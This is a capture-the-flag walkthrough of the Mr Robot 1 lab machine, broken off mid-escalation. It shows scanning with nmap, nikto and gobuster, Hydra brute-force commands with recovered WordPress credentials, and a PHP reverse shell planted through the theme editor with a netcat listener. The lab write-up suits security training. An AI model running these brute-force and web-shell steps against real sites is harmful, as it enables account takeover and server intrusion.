Mr Robot 1

you can download the target machine from here

then after you download the mrRobot.ova file import it into either virtualbox or vmware for me i am using vmware

and then change the network settings for this machine and make it in the same network as your attack machine

i have set my attack kali machine to bridged and the IP Subnet is 192.168.11.0/24 so i made the network settings for the target machine also to bridged

netdiscover -i <interface> -r <IP Subnet>

the Mr Robot1 machine IP for me is 192.168.11.107

Enumeration

nmap

so we have closed ssh port and an apache web server at port 80 and 443

web server enumeration

let view what endpoints we have at /robots.txt directory

First Key

so the first key is at the directory key-1-of-3.txt that we have found at /robots.txt directory

and now go to /fsociety.dic directory and a file called fsociety.dic is downloaded

┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# head fsocity.dic     
true
false
wikia
from
the
now
Wikia
extensions
scss
window

this looks like a custom wordlist let's see how much words it contains

┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# wc -l fsocity.dic 
858160 fsocity.dic

800k is a lot so let's remove duplicates

┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# sort fsocity.dic | uniq > fsocity2.dic

If after we have removed the duplicates, we are left with a word list of ~11k words. Let’s save it for later.

┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# wc -l fsocity2.dic                            
11451 fsocity2.dic

Web server scanning using Nikto

┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# nikto -host 192.168.11.107
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.11.107
+ Target Hostname:    192.168.11.107
+ Target Port:        80
+ Start Time:         2023-08-18 15:50:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.11.107/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2023-08-18 16:00:20 (GMT-4) (600 seconds)
---------------------------------------------------------------------------

and the scanning found a wordpress login page at /wp-login.php

Web server directory fuzzing

we can also find the wordpress login page by fuzzing the directories using gobuster or another similar tool like ffuf, dirbuster ...etc

gobuster dir -u http://192.168.11.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 301,404

so if we visit http://192.168.11.107/login we will be redirected to the wordpress login page

if we enter invalid credentials it will say invalid username so we can enumerate valid usernames and when we find a valid one we can use it to find the valid password

intercept the request using burp (i used random credentials like admin:admin)

Now we know the parameters of the form, let’s use Hydra to brute force. Remember the fsociety dictionary file, this is going to come handy while using Hydra

hydra -L fsocity2.dic -p invalidpass 192.168.11.107 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

Let’s break it down:

-L fsocity2 : Try all the usernames from the file fsocity.dic.uniq
-p invalidpass : Use an unique password, it doesn’t matter (we’re only interested in the username for now)
192.168.11.107 : The IP of the machine we’re attacking
http-post-form : What we’re trying to brute force, here a HTTP POST form
‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’
- /wp-login.php : The path to where the form is located
- log=^USER^&pwd=^PASS^&wp-submit=Log+In : The POST parameters to send. ^USER^ and ^PASS^ are placeholders that will be replaced with the actual values.
- F=Invalid username : Consider an attempt as a failure (F) if the response contains the text Invalid username

as a result we will get 3 valid usernames

[80][http-post-form] host: 192.168.11.107   login: elliot   password: invalidpass
[80][http-post-form] host: 192.168.11.107   login: Elliot   password: invalidpass
[80][http-post-form] host: 192.168.11.107   login: ELLIOT   password: invalidpass

if we log in with one of those usernames and a random password we will get this

next let's enumerate the password for the user elliot using hydra

hydra -l elliot -P fsocity2.dic 192.168.11.107 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

as a result we will find a valid password

[80][http-post-form] host: 192.168.11.107   login: elliot   password: ER28-0652

let's try now and login with elliot : ER28-0652

Foothold as user daemon

As you can see that we have gained access to the admin page of the WordPress site. We are not done yet as we need to get access to the server itself. For that, we get a reverse shell by uploading a reverse shell script.

I found a reverse shell script in PHP you can find it here, and edited it with my Host machine IP address and port that would be used for any incoming reverse connections.

now go to the dashboard in the left side menu click on Appearance -> Editor

now we will edit a php page and put our php reverse shell in it and then when we visit this page the php code will be executed and we will get a shell back

after pasting the rev shell code in the template make sure to save it by scrolling down to the end of the template code and you will find a button called update file

after this we have to execute the php code by visiting the link : http://192.168.11.07/404.php

but before doing so we have to setup a listener

┌──(root㉿kali)-[/home/kali]
└─# nc -nvlp 4444
listening on [any] 4444 ...

now visit the link

and you should recieve a shell

upgrade shell

Lateral Movement -> from daemon to robot

let's go to the home directory and see which users are there

so there is only the user robot

if we look at his directory we will find 2 files the first is the second key which we don't have permissions to read and the second file is the password hash for the user robot

the hash type is MD5

let's upload this file to an online service called crackstation to crack this MD5 hash